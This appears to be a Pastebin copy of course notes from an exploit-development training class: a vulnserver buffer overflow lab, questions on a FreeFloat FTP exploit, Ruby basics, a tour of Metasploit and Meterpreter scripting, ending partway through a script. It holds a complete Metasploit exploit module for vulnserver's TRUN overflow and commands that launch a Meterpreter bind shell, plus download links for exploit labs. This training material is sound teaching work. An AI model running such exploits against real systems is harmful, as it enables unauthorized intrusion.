joemccray

Munich Adv Hacking Course

Apr 1st, 2019
1,059
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ########
  2. # Tips #
  3. ########
  4. https://ired.team/offensive-security/powershell-constrained-language-mode-bypass
  5.  
  6.  
  7.  
  8. #####################################
  9. # Quick Stack Based Buffer Overflow #
  10. #####################################
  11.  
  12. - You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory)
  13. http://45.63.104.73/ExploitLab.zip
  14. http://45.63.104.73/nc-password-is-netcat.zip
  15. http://45.63.104.73/1-SEH.zip
  16. http://45.63.104.73/WarFTP.zip
  17. http://45.63.104.73/SEH.zip
  18. http://45.63.104.73/sws.zip
  19. http://45.63.104.73/tftpd.zip
  20. http://45.63.104.73/ffvlc.zip
  21. http://45.63.104.73/pdf-exploit.zip
  22.  
  23.  
  24. - Extract the ExploitLab.zip file to your Desktop
  25.  
  26. - Go to folder C:\Users\student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
  27.  
  28. - Open a new command prompt and type:
  29.  
  30. ---------------------------Type This-----------------------------------
  31.  
  32. nc localhost 9999
  33. --------------------------------------------------------------------------
  34.  
  35. - In the new command prompt window where you ran nc type:
  36. HELP
  37.  
  38. - Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
  39. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
  40.  
  41. - Now double-click on 1-simplefuzzer.py
  42. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
  43.  
  44.  
  45. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
  46.  
  47. - Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
  48.  
  49. - Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
  50.  
  51. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
  52.  
  53. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
  54.  
  55. - Calculate the distance to EIP by running script 3-3000chars.py
  56. - This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
  57.  
  58. 4-count-chars-to-EIP.py
  59. - In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
  60. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
  61.  
  62. 5-2006char-eip-check.py
  63. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
  64.  
  65. 6-jmp-esp.py
  66. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
  67.  
  68. 7-first-exploit
  69. - In this script we actually do the stack overflow and launch a bind shell on port 4444
  70.  
  71. 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
  72.  
  73.  
  74. ------------------------------
  75.  
  76.  
  77.  
  78. #########################################
  79. # FreeFloat FTP Server Exploit Analysis #
  80. #########################################
  81.  
  82.  
  83.  
  84. Analyze the following exploit code:
  85. https://www.exploit-db.com/exploits/15689/
  86.  
  87. 1. What is the target platform that this exploit works against?
  88. 2. What is the variable name for the distance to EIP?
  89. 3. What is the actual distance to EIP in bytes?
  90. 4. Describe what is happening in the variable ‘junk2’
  91.  
  92.  
  93.  
  94.  
  95. Analysis of the training walk-through based on EID: 15689:
  96. http://45.63.104.73/ff.zip
  97.  
  98.  
  99.  
  100.  
  101. ff1.py
  102. 1. What does the sys module do? Call System Commands
  103. 2. What is sys.argv[1] and sys.argv[2]?
  104. 3. What application entry point is being attacked in this script?
  105.  
  106.  
  107.  
  108. ff2.py
  109. 1. Explain what is happening in lines 18 - 20 doing.
  110. 2. What pattern_create.rb doing and where can I find it?
  111. 3. Why can’t I just double click the file to run this script?
  112.  
  113.  
  114.  
  115. ff3.py
  116. 1. Explain what is happening in lines 17 - to 25?
  117. 2. Explain what is happening in lines 30 - to 32?
  118. 3. Why is everything below line 35 commented out?
  119.  
  120.  
  121.  
  122. ff4.py
  123. 1. Explain what is happening in lines 13 - to 15.
  124. 2. Explain what is happening in line 19.
  125. 3. What is the total length of buff?
  126.  
  127.  
  128.  
  129. Ff5.py
  130. 1. Explain what is happening in line 15.
  131. 2. What is struct.pack?
  132. 3. How big is the shellcode in this script?
  133.  
  134.  
  135.  
  136. ff6.py
  137. 1. What is the distance to EIP?
  138. 2. How big is the shellcode in this script?
  139. 3. What is the total byte length of the data being sent to this app?
  140.  
  141.  
  142.  
  143.  
  144. ff7.py
  145. 1. What is a tuple in python?
  146. 2. How big is the shellcode in this script?
  147. 3. Did your app crash in from this script?
  148.  
  149.  
  150.  
  151.  
  152. ff8.py
  153. 1. How big is the shellcode in this script?
  154. 2. What is try/except in python?
  155. 3. What is socket.SOCK_STREAM in Python?
  156.  
  157.  
  158.  
  159. ff9.py
  160. 1. What is going on in lines 19 and 20?
  161. 2. What is the length of the NOPs?
  162. 3. What is socket.SOCK_STREAM in Python?
  163.  
  164.  
  165.  
  166.  
  167. ff010.py
  168. 1. What is going on in lines 18 - 20?
  169. 2. What is going on in lines 29 - 32?
  170. 3. How would a stack adjustment help this script?
  171.  
  172.  
  173. Required review videos to watch tonight:
  174. ----------------------------------------
  175. https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl
  176. Please watch videos 1-5 tonight. Vivek has a deep accent so I understand that it may be difficult but his material is very good - probably the best on the internet today.
  177.  
  178. Recommended (not required) videos to watch tonight:
  179. ---------------------------------------------------
  180. For more background on Assembly I would recommend the following video series (videos 1-11):
  181. https://www.youtube.com/playlist?list=PL6brsSrstzga43kcZRn6nbSi_GeXoZQhR
  182. Again, you DO NOT have to watch these tonight but if you are really interested in the subject of exploit development I think they will be very helpful.
  183.  
  184.  
  185.  
  186. ---------------------------------------------------------------------------------------------------------------------############################
  187. # Day 2: Ruby Fundamentals #
  188. ############################
  189.  
  190.  
  191.  
  192. - Ruby is a general-purpose, object-oriented programming language, which was created by Yukihiro Matsumoto, a computer
  193. scientist and programmer from Japan. It is a cross-platform dynamic language.
  194.  
  195. - The major implementations of this language are Ruby MRI, JRuby, HotRuby, IronRuby, MacRuby, etc. Ruby
  196. on Rails is a framework that is written in Ruby.
  197.  
  198. - Ruby's file name extensions are .rb and .rbw.
  199.  
  200. - official website of this
  201.  
  202. - language: www.ruby-lang.org.
  203.  
  204.  
  205. - interactive Shell called Ruby Shell
  206.  
  207. - open up the interactive console and play around.
  208.  
  209. ---------------------------Type This-----------------------------------
  210. irb
  211. -----------------------------------------------------------------------
  212.  
  213.  
  214. - Math, Variables, Classes, Creating Objects and Inheritance
  215.  
  216.  
  217. The following arithmetic operators:
  218. Addition operator (+) — 10 + 23
  219. Subtraction operator (-) — 1001 - 34
  220. Multiplication operator (*) — 5 * 5
  221. Division operator (/) — 12 / 2
  222.  
  223.  
  224.  
  225. - Now let's cover some variable techniques. In Ruby, you can assign a value to a variable using the assignment
  226. operator. '=' is the assignment operator. In the following example, 25 is assigned to x. Then x is incremented by
  227. 30. Again, 69 is assigned to y, and then y is incremented by 33.
  228.  
  229. ---------------------------Type This-----------------------------------
  230. x = 25
  231. x + 30
  232. y = 69
  233. y+33
  234. -----------------------------------------------------------------------
  235.  
  236.  
  237.  
  238. - Let's look at creating classes and creating objects.
  239.  
  240. - Here, the name of the class is Attack. An object has its properties and methods.
  241.  
  242.  
  243. ---------------------------Type This-----------------------------------
  244. class Attack
  245. attr_accessor :of, :sqli, :xss
  246. end
  247. -----------------------------------------------------------------------
  248.  
  249.  
  250. What is nil?
  251. Reference:
  252. https://www.codecademy.com/en/forum_questions/52a112378c1cccb0f6001638
  253.  
  254. nil is the Ruby object that represents nothingness. Whenever a method doesn’t return a useful value, it returns nil. puts and print are methods that return nil:
  255.  
  256. Since the Ruby Console always shows the value of the last statement or expression in your code, if that last statement is print, you’ll see the nil.
  257.  
  258. To prevent the nil from "sticking" to the output of print (which doesn’t insert a line break), you can print a line break after it, and optionally put some other value as the last statement of your code, then the Console will show it instead of nil:
  259.  
  260.  
  261.  
  262.  
  263.  
  264. # Now that we have created the classes let's create the objects
  265. ---------------------------Type This-----------------------------------
  266. first_attack = Attack.new
  267. first_attack.of = "stack"
  268. first_attack.sqli = "blind"
  269. first_attack.xss = "dom"
  270. puts first_attack.of
  271. puts first_attack.sqli
  272. puts first_attack.xss
  273. -----------------------------------------------------------------------
  274.  
  275.  
  276.  
  277.  
  278. - Let's work on some inheritance that will help make your programming life easier. When we have multiple classes,
  279. inheritance becomes useful. In simple words, inheritance is the classification of classes. It is a process by which
  280. one object can access the properties/attributes of another object of a different class. Inheritance makes your
  281. programming life easier by maximizing code reuse.
  282.  
  283.  
  284. ---------------------------Type This-----------------------------------
  285. class Exploitframeworks
  286. attr_accessor :scanners, :exploits, :shellcode, :postmodules
  287. end
  288. class Metasploit < Exploitframeworks
  289. end
  290. class Canvas < Exploitframeworks
  291. end
  292. class Coreimpact < Exploitframeworks
  293. end
  294. class Saint < Exploitframeworks
  295. end
  296. class Exploitpack < Exploitframeworks
  297. end
  298. -----------------------------------------------------------------------
  299.  
  300.  
  301.  
  302.  
  303. - Methods, More Objects, Arguments, String Functions and Expression Shortcuts
  304.  
  305. - Let's create a simple method. A method is used to perform an action and is generally called with an object.
  306.  
  307. - Here, the name of the method is 'learning'. This method is defined inside the Msfnl class. When it is called,
  308. it will print this string: "We are Learning how to PenTest"
  309.  
  310. - An object named 'bo' is created, which is used to call the method.
  311.  
  312.  
  313. ---------------------------Type This-----------------------------------
  314. class Msfnl
  315. def learning
  316. puts "We are Learning how to PenTest"
  317. end
  318. end
  319. -----------------------------------------------------------------------
  320.  
  321. #Now let's define an object for our Method
  322.  
  323. ---------------------------Type This-----------------------------------
  324. joe = Msfnl.new
  325. joe.learning
  326. -----------------------------------------------------------------------
  327.  
  328.  
  329.  
  330. - An argument is a value or variable that is passed to the function while calling it. In the following example, while
  331. calling the puts() function, we are sending a string value to the function. This string value is used by the
  332. function to perform some particular operations.
  333.  
  334. puts ("Pentesting")
  335.  
  336.  
  337. - There are many useful string functions in Ruby. String functions make it easy to work with strings. Now, we will
  338. explain some useful string functions with an example.
  339.  
  340. - The length function calculates the length of a string. The upcase function converts a string to uppercase. And the
  341. reverse function reverses a string. The following example demonstrates how to use the string functions.
  342.  
  343. ---------------------------Type This-----------------------------------
  344. 55.class
  345. "I Love Programming".class
  346. "I Love Pentesting".length
  347. "Pown that box".upcase
  348. "Love" + "To Root Boxes"
  349. "evil".reverse
  350. "evil".reverse.upcase
  351. -----------------------------------------------------------------------
  352.  
  353.  
  354. - expressions and shortcuts. In the below example, 'a' is an operand, '3' is an operand, '=' is
  355. an operator, and 'a=3' is the expression. A statement consists of one or multiple expressions. Following are the
  356. examples of some expressions.
  357.  
  358. ---------------------------Type This-----------------------------------
  359. a = 3
  360. b = 6
  361. a+b+20
  362. d = 44
  363. f = d
  364. puts f
  365. -----------------------------------------------------------------------
  366.  
  367.  
  368.  
  369.  
  370.  
  371. - shortcuts. +=, *= are the shortcuts. These operators are also called abbreviated
  372. assignment operators. Use the shortcuts to get the effect of two statements in just one. Consider the following
  373. statements to understand the shortcuts.
  374.  
  375. ---------------------------Type This-----------------------------------
  376. g = 70
  377. g = g+44
  378. g += 33
  379. -----------------------------------------------------------------------
  380.  
  381.  
  382. - In the above statement, g is incremented by 33 and then the total value is assigned to g.
  383.  
  384.  
  385.  
  386. ---------------------------Type This-----------------------------------
  387. g *= 3
  388. -----------------------------------------------------------------------
  389.  
  390.  
  391. - In the above statement, g is multiplied with 3 and then assigned to g.
  392.  
  393. - Example
  394.  
  395. - Comparison Operators, Loops, Data Types, and Constants
  396.  
  397. - Comparison operators are used for comparing one variable or constant with another variable or constant. We will show
  398. how to use the following comparison operators.
  399.  
  400. 'Less than' operator (<): This operator is used to check whether a variable or constant is less than another
  401. variable or constant. If it's less than the other, the 'less than' operator returns true.
  402.  
  403. 'Equal to' operator (==): This operator is used to check whether a variable or constant is equal to another variable
  404. or constant. If it's equal to the other, the 'equal to' operator returns true.
  405.  
  406. 'Not equal to' operator (!=): This operator is used to check whether a variable or constant is not equal to another
  407. variable or constant. If it's not equal to the other, the 'not equal to' operator returns true.
  408.  
  409. ---------------------------Type This-----------------------------------
  410. numberofports = 55
  411. puts "number of ports found during scan" if numberofports < 300
  412. numberofports = 400
  413. puts "number of ports found during scan" if numberofports < 300
  414. puts "number of ports found during scan" if numberofports == 300
  415. puts "number of ports found during scan" if numberofports != 300
  416. -----------------------------------------------------------------------
  417.  
  418.  
  419.  
  420. Example
  421.  
  422.  
  423. - the 'OR' operator and the 'unless' keyword. This symbol '||' represents the logical 'OR' operator.
  424.  
  425. - This operator is generally used to combine multiple conditions.
  426. - In case of two conditions, if both or any of the conditions is true, the 'OR'operator returns true. Consider the
  427.  
  428. - following example to understand how this operator works.
  429.  
  430. ---------------------------Type This-----------------------------------
  431. ports = 100
  432. puts "number of ports found on the network" if ports<100 || ports>200
  433. puts "number of ports found on the network" if ports<100 || ports>75
  434. -----------------------------------------------------------------------
  435.  
  436. # unless
  437.  
  438. ---------------------------Type This-----------------------------------
  439. portsbelow1024 = 50
  440. puts "If the ports are below 1024" unless portsbelow1024 < 1000
  441. puts "If the ports are below 1024" unless portsbelow1024 < 1055
  442. puts "If the ports are below 1024" unless portsbelow1024 < 20
  443. -----------------------------------------------------------------------
  444.  
  445. - The 'unless' keyword is used to do something programmatically unless a condition is true.
  446.  
  447.  
  448.  
  449. - Loops are used to execute statement(s) repeatedly. Suppose you want to print a string 10 times.
  450.  
  451. - See the following example to understand how a string is printed 10 times on the screen using a loop.
  452.  
  453. ---------------------------Type This-----------------------------------
  454. 10.times do puts "infosecaddicts" end
  455. -----------------------------------------------------------------------
  456.  
  457. # Or use the curly braces
  458.  
  459. ---------------------------Type This-----------------------------------
  460. 10.times {puts "infosecaddicts"}
  461. -----------------------------------------------------------------------
  462.  
  463.  
  464. - Changing Data Types: Data type conversion is an important concept in Ruby because it gives you flexibility while
  465. working with different data types. Data type conversion is also known as type casting.
  466.  
  467.  
  468.  
  469. - Constants: Unlike variables, the values of constants remain fixed during the program interpretation. So if you
  470. change the value of a constant, you will see a warning message.
  471.  
  472.  
  473.  
  474.  
  475. - Multiple Line String Variable, Interpolation, and Regular Expressions
  476.  
  477. - A multiple line string variable lets you assign the value to the string variable through multiple lines.
  478.  
  479. ---------------------------Type This-----------------------------------
  480. infosecaddicts = <<mark
  481. welcome
  482. to the
  483. best
  484. metasploit
  485. course
  486. on the
  487. market
  488. mark
  489. puts infosecaddicts
  490. -----------------------------------------------------------------------
  491.  
  492.  
  493. - Interpolation lets you evaluate any placeholder within a string, and the placeholder is replaced with the value that
  494. it represents. So whatever you write inside #{ } will be evaluated and the value will be replaced at that position.
  495. Examine the following example to understand how interpolation works in Ruby.
  496.  
  497. References:
  498. https://stackoverflow.com/questions/10869264/meaning-of-in-ruby
  499.  
  500.  
  501. ---------------------------Type This-----------------------------------
  502. a = 4
  503. b = 6
  504. puts "a * b = a*b"
  505. puts " #{a} * #{b} = #{a*b} "
  506. person = "Joe McCray"
  507. puts "IT Security consultant person"
  508. puts "IT Security consultant #{person}"
  509. -----------------------------------------------------------------------
  510.  
  511. - Notice that the placeholders inside #{ } are evaluated and they are replaced with their values.
  512.  
  513.  
  514.  
  515.  
  516.  
  517. - Character classes
  518. ---------------------------Type This-----------------------------------
  519. infosecaddicts = "I Scanned 45 hosts and found 500 vulnerabilities"
  520. "I love metasploit and what it has to offer!".scan(/[lma]/) {|y| puts y}
  521. "I love metasploit and what it has to offer!".scan(/[a-m]/) {|y| puts y}
  522. -----------------------------------------------------------------------
  523.  
  524.  
  525. - Arrays, Push and Pop, and Hashes
  526.  
  527.  
  528. - In the following example, numbers is an array that holds 6 integer numbers.
  529.  
  530.  
  531. ---------------------------Type This-----------------------------------
  532. numbers = [2,4,6,8,10,100]
  533. puts numbers[0]
  534. puts numbers[4]
  535. numbers[2] = 150
  536. puts numbers
  537. -----------------------------------------------------------------------
  538.  
  539.  
  540.  
  541. - Now we will show how you can implement a stack using an array in Ruby. A stack has two operations - push and pop.
  542.  
  543.  
  544. ---------------------------Type This-----------------------------------
  545. framework = []
  546. framework << "modules"
  547. framework << "exploits"
  548. framework << "payloads"
  549. framework.pop
  550. framework.shift
  551. -----------------------------------------------------------------------
  552.  
  553. - Hash is a collection of elements, which is like the associative array in other languages. Each element has a key
  554. that is used to access the element.
  555.  
  556.  
  557. - Hash is a Ruby object that has its built-in methods. The methods make it easy to work with hashes.
  558. In this example, 'metasploit' is a hash. 'exploits', 'microsoft', 'Linux' are the keys, and the following are the
  559. respective values: 'what module should you use', 'Windows XP' and 'SSH'.
  560.  
  561. ---------------------------Type This-----------------------------------
  562. metasploit = {'exploits' => 'what module should you use', 'microsoft' => 'Windows XP', 'Linux' => 'SSH'}
  563. print metasploit.size
  564. print metasploit["microsoft"]
  565. metasploit['microsoft'] = 'redhat'
  566. print metasploit['microsoft']
  567. -----------------------------------------------------------------------
  568.  
  569.  
  570.  
  571. - Writing Ruby Scripts
  572.  
  573.  
  574. - Let's take a look at one of the ruby modules and see exactly now what it is doing. Now explain to me exactly what
  575. this program is doing. If we take a look at the ruby program what you find is that it is a TCP port scanner that
  576. someone made to look for a specific port. The port that it is looking for is port 21 FTP.
  577. ---------------------------Type This-----------------------------------
  578. cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan
  579. ls
  580. -----------------------------------------------------------------------
  581.  
  582.  
  583.  
  584. ###########################
  585. # Metasploit Fundamentals #
  586. ###########################
  587.  
  588. - Let's take a little look at Metasploit Framework
  589.  
  590. - First, we should take note of the different directories, the Modular Architecture.
  591.  
  592. The modules that make up the Modular Architecture are
  593. Exploits
  594. Auxiliary
  595. Payload
  596. Encoder
  597. Nops
  598.  
  599.  
  600. Important directories to keep in mind for Metasploit, in case we'd like to edit different modules, or add our own,
  601.  
  602. are
  603.  
  604. Modules
  605. Scripts
  606. Plugins
  607. External
  608. Data
  609. Tools
  610.  
  611. - Let's take a look inside the Metasploit directory and see what's the
  612. ---------------------------Type This-----------------------------------
  613. cd /usr/share/metasploit-framework
  614. ls
  615. -----------------------------------------------------------------------
  616.  
  617.  
  618.  
  619. - Now let's take a look inside the Modules directory and see what's there.
  620. ---------------------------Type This-----------------------------------
  621. cd /usr/share/metasploit-framework/modules
  622. ls
  623. -----------------------------------------------------------------------
  624.  
  625.  
  626. The auxiliary directory is where the things like our port-scanners will be, or any module that we can run that does
  627. not necessarily need to - have a shell or session started on a machine.
  628.  
  629. The exploits directory has our modules that we need to pop a shell on a box.
  630. The external directory is where we can see all of the modules that use external libraries from tools Metasploit uses
  631. like Burp Suite
  632. - Let's take a look at the external directory
  633. ---------------------------Type This-----------------------------------
  634. cd /usr/share/metasploit-framework/external
  635. ls
  636. -----------------------------------------------------------------------
  637.  
  638. - Our data directory holds helper modules for Metasploit to use with exploits or auxiliary modules.
  639. ---------------------------Type This-----------------------------------
  640. cd /usr/share/metasploit-framework/data
  641. ls
  642. -----------------------------------------------------------------------
  643.  
  644. - For example, the wordlist directory holds files that have wordlists in them for brute-forcing logins or doing DNS
  645. brute-forcing
  646. ---------------------------Type This-----------------------------------
  647. cd /usr/share/metasploit-framework/data/wordlists
  648. ls
  649. -----------------------------------------------------------------------
  650.  
  651. - The Meterpreter directory inside of the data directory houses the DLLs used for the functionality of Meterpreter
  652. once a session is created.
  653. ---------------------------Type This-----------------------------------
  654. cd /usr/share/metasploit-framework/data/meterpreter
  655. ls
  656. -----------------------------------------------------------------------
  657.  
  658. - The scripts inside the scripts/Meterpreter directory are scripts that Meterpreter uses for post-exploitation, things
  659. like escalating privileges and dumping hashes.
  660.  
  661. These are being phased out, though, and post-exploitation modules are what is being more preferred.
  662. The next important directory that we should get used to is the 'tools' directory. Inside the tools directory we'll
  663. find a bunch of different ruby scripts that help us on a pentest with things ranging from creating a pattern of code
  664. for creating exploits, to a pattern offset script to find where at in machine language that we need to put in our
  665. custom shellcode.
  666.  
  667. The final directory that we'll need to keep in mind is the plugins directory, which houses all the modules that have
  668. to do with other programs to make things like importing and exporting reports simple.
  669. Now that we have a clear understanding of what all of the different directories house, we can take a closer look at
  670. the exploits directory and get a better understanding of how the directory structure is there, so if we make our own
  671. modules we're going to have a better understanding of where everything needs to go.
  672. ---------------------------Type This-----------------------------------
  673. cd /usr/share/metasploit-framework/modules/exploits
  674. ls
  675. -----------------------------------------------------------------------
  676.  
  677.  
  678. - The exploits directory is split up into several different directories, each one housing exploits for different types
  679. of systems. I.E. Windows, Unix, OSX, dialup and so on.
  680. Likewise, if we were to go into the 'windows' directory, we're going to see that the exploits have been broken down
  681. into categories of different types of services/programs, so that you can pick out an exploit specifically for the
  682. service you're trying to exploit. Let's dig a little deeper into the auxiliary directory and see what all it holds
  683. for us.
  684. ---------------------------Type This-----------------------------------
  685. cd /usr/share/metasploit-framework/modules/auxiliary/
  686. ls
  687. -----------------------------------------------------------------------
  688.  
  689.  
  690. - And a little further into the directory, let's take a look at what's in the scanner directory
  691. ---------------------------Type This-----------------------------------
  692. cd /usr/share/metasploit-framework/modules/auxiliary/scanner/
  693. ls
  694. -----------------------------------------------------------------------
  695.  
  696.  
  697. - And one more folder deeper into the structure, let's take a look in the portscan folder
  698. ---------------------------Type This-----------------------------------
  699. cd /usr/share/metasploit-framework/modules/auxiliary/scanner/portscan
  700. ls
  701. -----------------------------------------------------------------------
  702.  
  703. - If we run 'cat tcp.rb' we'll find that this module is simply a TCP scanner that will find tcp ports that are open
  704. and report them back to us in a nice, easily readable format.
  705.  
  706. cat tcp.rb
  707.  
  708.  
  709.  
  710. - Just keep in mind that all of the modules in the auxiliary directory are there for information gathering and for use
  711. once you have a session on a machine.
  712. Taking a look at the payload directory, we can see all the available payloads, which are what run after an exploit
  713. succeeds.
  714. ---------------------------Type This-----------------------------------
  715. cd /usr/share/metasploit-framework/modules/payloads/
  716. ls
  717. -----------------------------------------------------------------------
  718.  
  719.  
  720. - There are three different types of payloads: single, stagers, and staged. Each type of payload has a different
  721. application for it to be used as.
  722. Single payloads do everything you need them to do at one single time, so they call a shell back to you and let you
  723. do everything once you have that shell calling back to you.
  724. Stagers are required for limited payload space so that the victim machine will call back to your attack box to get
  725. the rest of the instructions on what it's supposed to do. The first stage of the payload doesn't require all that
  726. much space to just call back to the attacking machine to have the rest of the payload sent to it, mainly being used
  727. to download Stages payloads.
  728.  
  729.  
  730. - Stages are downloaded by stagers and typically do complex tasks, like VNC sessions, Meterpreter sessions, or bind
  731. shells.
  732. ---------------------------Type This-----------------------------------
  733. cd singles
  734. cd windows
  735. ls
  736. -----------------------------------------------------------------------
  737.  
  738.  
  739. - We can see several different payloads here that we can use on a windows system. Let's take a look at adduser.rb and
  740. see what it actually does.
  741. ---------------------------Type This-----------------------------------
  742. cat adduser.rb
  743. -----------------------------------------------------------------------
  744.  
  745. Which when looking at the code, we can see that it will add a new user called "Metasploit" to the machine and give
  746. the new user "Metasploit" a password of "Metasploit$1" Further down in the file we can actually see the command that
  747. it gives Windows to add the user to the system.
  748.  
  749.  
  750. - Stagers just connect to victim machine back to yours to download the Stages payload, usually with a
  751.  
  752. windows/shell/bind_tcp or windows/shell/reverse_tcp
  753. ---------------------------Type This-----------------------------------
  754. cd ../../stagers
  755. ls
  756. -----------------------------------------------------------------------
  757.  
  758.  
  759.  
  760. - Again, we can see that we have stagers for multiple systems and code types.
  761. ---------------------------Type This-----------------------------------
  762. ls windows/
  763. -----------------------------------------------------------------------
  764.  
  765.  
  766. As you can see, the stagers are mainly just to connect to the victim, to setup a bridge between us and the victim
  767. machine, so we can upload or download our stage payloads and execute commands.
  768. Lastly, we can go to our stages directory to see what all payloads are available for us to send over for use with
  769. our stagers...
  770. ---------------------------Type This-----------------------------------
  771. cd ../stages
  772. ls
  773. -----------------------------------------------------------------------
  774.  
  775.  
  776. Again, we can see that our stages are coded for particular operating systems and languages.
  777. We can take a look at shell.rb and see the shellcode that would be put into the payload that would be staged on the
  778. victim machine which would be encoded to tell the victim machine where to connect back to and what commands to run,
  779. if any.
  780.  
  781. - Other module directories include nops, encoders, and post. Post modules are what are used in sessions that have
  782. already been opened in meterpreter, to gain more information on the victim machine, collect hashes, or even tokens,
  783. so we can impersonate other users on the system in hopes of elevating our privileges.
  784. ---------------------------Type This-----------------------------------
  785. cd ../../../post/
  786. ls
  787. cd windows/
  788. ls
  789. -----------------------------------------------------------------------
  790.  
  791.  
  792. Inside the windows directory we can see all the post modules that can be run, capture is a directory that holds all
  793. the modules to load keyloggers, or grab input from the victim machine. Escalate has modules that will try to
  794. escalate our privileges. Gather has modules that will try to enumerate the host to get as much information as
  795. possible out of it. WLAN directory holds modules that can pull down WiFi access points that the victim has in
  796. memory/registry and give you the AP names as well as the WEP/WPA/WPA2 key for the network.
  797.  
  798. ------------------------------
  799.  
  800.  
  801.  
  802.  
  803. ------------------------------------------
  804.  
  805. ------------------------------------------
  806.  
  807.  
  808.  
  809.  
  810.  
  811.  
  812. ---------------------------Type This-----------------------------------
  813.  
  814. cd /usr/share/metasploit-framework/modules/exploits/windows/misc
  815.  
  816. nano vulnserv.rb
  817. -------(paste the code below into this file)-------
  818. #
  819. #
  820. # Quick Metasploit exploit for vulnserver.exe
  821. # Written by: Joe McCray
  822. # Email: joe@strategicsec.com
  823. #
  824. # Place this exploit in:
  825. # /usr/share/metasploit-framework/modules/exploits/windows/misc
  826. #
  827. require 'msf/core'
  828.  
  829. class Metasploit3 < Msf::Exploit::Remote
  830. include Msf::Exploit::Remote::Tcp
  831. def initialize(info = {})
  832. super(update_info(info,
  833. 'Name' => 'Custom vulnerable server stack overflow',
  834. 'Description' => %q{
  835. This module exploits a stack overflow in an app called
  836. vulnserver that is designed to teach simple exploitation.
  837. },
  838. 'Author' => [ 'Joe McCray' ],
  839. 'DefaultOptions' =>
  840. {
  841. 'EXITFUNC' => 'process',
  842. },
  843. 'Payload' =>
  844. {
  845. 'Space' => 800,
  846. 'BadChars' => "\x00\x20",
  847. },
  848. 'Platform' => 'win',
  849.  
  850. 'Targets' =>
  851. [
  852. [
  853. 'Windows XP SP3 EN',
  854. {
  855. 'Ret' => 0x625011AF,
  856. }
  857. ],
  858. ],
  859. 'DefaultTarget' => 0,
  860.  
  861. 'Privileged' => false
  862. ))
  863.  
  864. register_options(
  865. [
  866. Opt::RPORT(9999)
  867. ], self.class)
  868. end
  869.  
  870. def exploit
  871. connect
  872. sock.recv(1024)
  873.  
  874. p = "\x41" * 16
  875. p << payload.encoded
  876.  
  877. hdr = "TRUN ."
  878. boom = pattern_create(3000)
  879. boom[2006, 4] = [target.ret].pack('V') # EIP value
  880. boom[2010, p.length] = p
  881.  
  882. sploit = hdr + boom
  883.  
  884. sock.put(sploit)
  885.  
  886. handler
  887. disconnect
  888.  
  889. end
  890.  
  891. end
  892. ------------------end of copy/paste content --------------
  893.  
  894.  
  895.  
  896. ---------------------------Type This-----------------------------------
  897. cd /usr/share/metasploit-framework
  898.  
  899. ./msfconsole
  900.  
  901.  
  902.  
  903. use exploit/windows/misc/vulnserv
  904. set PAYLOAD windows/meterpreter/bind_tcp
  905. set RHOST CHANGEME-TO-YOUR-WIN7-IP
  906. set RPORT 9999
  907. exploit
  908. -----------------------------------------------------------------------
  909.  
  910.  
  911.  
  912.  
  913.  
  914. ########################################
  915. # Down and dirty Meterpreter Scripting #
  916. ########################################
  917.  
  918. -----------------------------------------------------------------------
  919. - In this lab we will be looking at how you can use some custom Meterpreter scripts to do more than what Metasploit
  920.  
  921. can offer. This will also show you the flexibility of the Meterpreter scripts.
  922.  
  923. - We're going to start off with a simple Hello World script first.
  924.  
  925. - Keep your meterpreter shell open from the previous lab exercises, and in a new Linux command window type the following:
  926. ---------------------------Type This-----------------------------------
  927. echo 'print_status("Hello World")' > /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb
  928. -----------------------------------------------------------------------
  929.  
  930. - This next portion is up to you, exploit your test box and end up with a Meterpreter shell.
  931.  
  932. - Lets test out our helloworld.rb Meterpreter script.
  933.  
  934. ---------------------------Type This-----------------------------------
  935. meterpreter> run helloworld
  936. -----------------------------------------------------------------------
  937.  
  938. - So far so good, now we can build on this base. Lets add a couple more API calls to the script.
  939.  
  940. - Open /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb in your favorite and add following
  941.  
  942. line.
  943. ---------------------------Type This-----------------------------------
  944. vi /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb
  945. -------(paste the code below into this file)-------
  946. print_error("this is an error!")
  947. print_line("this is a line")
  948. -----------------------------------------------------------------------
  949.  
  950.  
  951. - Now run the script:
  952.  
  953. meterpreter> run helloworld
  954.  
  955.  
  956. - Now that we have the basics down, we're going to do something a little more exciting.
  957. - The architecture to follow when creating these scripts goes as follows:
  958.  
  959. def getinfo(session)
  960. begin
  961. <stuff goes here>
  962. rescue ::Exception => e
  963. <stuff goes here>
  964. end
  965. end
  966.  
  967. -----------------------------------------------------------------------
  968.  
  969.  
  970.  
  971. - Copy and paste the following code into our helloworld.rb script:
  972. ---------------------------Type This-----------------------------------
  973. vi /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb
  974. -------(paste the code below into this file)-------
  975. def getinfo(session)
  976. begin
  977. sysnfo = session.sys.config.sysinfo
  978. runpriv = session.sys.config.getuid
  979. print_status("Getting system information ...")
  980. print_status("The target machine OS is #{sysnfo['OS']}")
  981. print_status("The computer name is #{'Computer'} ")
  982. print_status("Script running as #{runpriv}")
  983. rescue ::Exception => e
  984. print_error("The following error was encountered #{e}")
